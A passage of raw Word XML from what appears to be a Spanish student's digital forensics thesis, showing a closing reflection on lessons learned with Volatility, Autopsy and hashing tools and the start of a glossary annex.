        </w:rPr>
        <w:t>entrega</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> debería haber empezado directamente con Word. La</w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>LaTeX: Sistema de composición de textos, ampliamente utilizado para la producción de documentos científicos y matemáticos.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> era nuevo para </w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mí</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, creo que los experimentos hay que hacerlos con gaseosa. </w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mark Down</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> podía tener un seguimiento de lo que iba haciendo sin problemas en </w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">it, pero fue </w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>desaconsejado</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> por la tutora y a muy buen criterio. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C775495" w14:textId="3CF1B37E" w:rsidR="00AD4A46" w:rsidRPr="00BB381F" w:rsidRDefault="00BB381F" w:rsidP="00AD4A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Que he aprendido:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C344AA" w14:textId="276430A2" w:rsidR="00FE5B69" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tener una mejor capacidad de análisis con respecto a los ejercicios de cuando hice la asignatura hace ya dos años.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E417633" w14:textId="33DE7D02" w:rsidR="00AD4A46" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La generación de perfiles que no están incluidos en volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8499D" w14:textId="33B40E47" w:rsidR="00AD4A46" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mejor manejo en Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA623E" w14:textId="417B8E32" w:rsidR="00AD4A46" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con la terminal de Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de uso.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, WSL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>WSL (Windows Subsystem for Linux): Capa de compatibilidad para ejecutar binarios de Linux de forma nativa en Windows.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o PoweShell</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>PowerShell: Lenguaje de scripting y shell de línea de comandos desarrollado por Microsoft.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una herramienta eficaz para hacer los hashes</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hashes: Plural de hash</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3DBB7" w14:textId="6F984302" w:rsidR="00AD4A46" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tener que revisar alguna suposición siempre es positivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C1DE2" w14:textId="52F40C72" w:rsidR="00AD4A46" w:rsidRDefault="00BB381F" w:rsidP="00AD4A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Que hubiera hecho diferente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8B30A" w14:textId="7E25AD2D" w:rsidR="00AD4A46" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cambiaré el proceso de búsqueda si tengo que buscar el sistema operativo. Creo que es </w:t>
      </w:r>
      <w:r w:rsidR="00BB381F" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ágil entrar en Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ver su estructuración y decir vale estoy en un Windows o estoy en un Linux, la estructura de carpetas es </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>característico</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y es mucho </w:t>
      </w:r>
      <w:r w:rsidR="00BB381F" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rápido revisar. Si tengo dudas, Autopsy me lo va a decir rápido sin tener dudas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C596E12" w14:textId="78D23738" w:rsidR="00BB381F" w:rsidRPr="00BB381F" w:rsidRDefault="00AD4A46">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En caso de necesidad de un kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de uso.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, miraría /boot y buscaría el/los kernels. Si hay 2 kernels hago 2 perfiles y después en volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> probaría sin problemas. Creo que se gana mucho tiempo en ese sentido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49272AD2" w14:textId="135093C1" w:rsidR="00BB381F" w:rsidRPr="00BB381F" w:rsidRDefault="00BB381F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hubiera sacado todos los comandos con salida a un TXT. Creo que es lo más fácil para después analizar y limpiar datos si es necesario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D76AFC" w14:textId="32ED49A9" w:rsidR="00BB381F" w:rsidRPr="00BB381F" w:rsidRDefault="00BB381F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No me hubiera metido este semestre 24 créditos, con los 12 del TFM hubiera tenido de sobra porque no he podido arreglar en imprevistos.</w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Familia, traslados, trabajo, es mucha carga en la mochila de uno.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Este es </w:t>
      </w:r>
      <w:r w:rsidR="00443705">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00443705">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>personal,</w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero espero que a algún alumno le sirva en el futuro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476947D" w14:textId="2A8D3A78" w:rsidR="00BB381F" w:rsidRPr="003E49E7" w:rsidRDefault="00BB381F" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADD07EB" w14:textId="54A0F4C7" w:rsidR="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Muchas Gracias por todo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB590D" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44498C87" w14:textId="3EBB7CA4" w:rsidR="003E49E7" w:rsidRDefault="00B82287" w:rsidP="00B82287">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc155782524"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Anexos.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="45C12EDD" w14:textId="77777777" w:rsidR="00443705" w:rsidRDefault="00443705" w:rsidP="00443705"/>
    <w:p w14:paraId="04404767" w14:textId="30422A0E" w:rsidR="00443705" w:rsidRDefault="004C5DDC" w:rsidP="00443705">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc155782525"/>
      <w:r>
        <w:t xml:space="preserve">I. </w:t>
      </w:r>
      <w:r w:rsidR="00443705">
        <w:t>Glosario de términos y abreviaturas</w:t>
      </w:r>
      <w:r w:rsidR="00BD49D1">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="4ECDBB3E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863" w:rsidP="00BD49D1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:sectPr w:rsidR="00D16863" w:rsidSect="00B93CA3">
          <w:footerReference w:type="first" r:id="rId281"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INDEX \e " · " \h "A" \c "1" \z "3082" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="459519BB" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
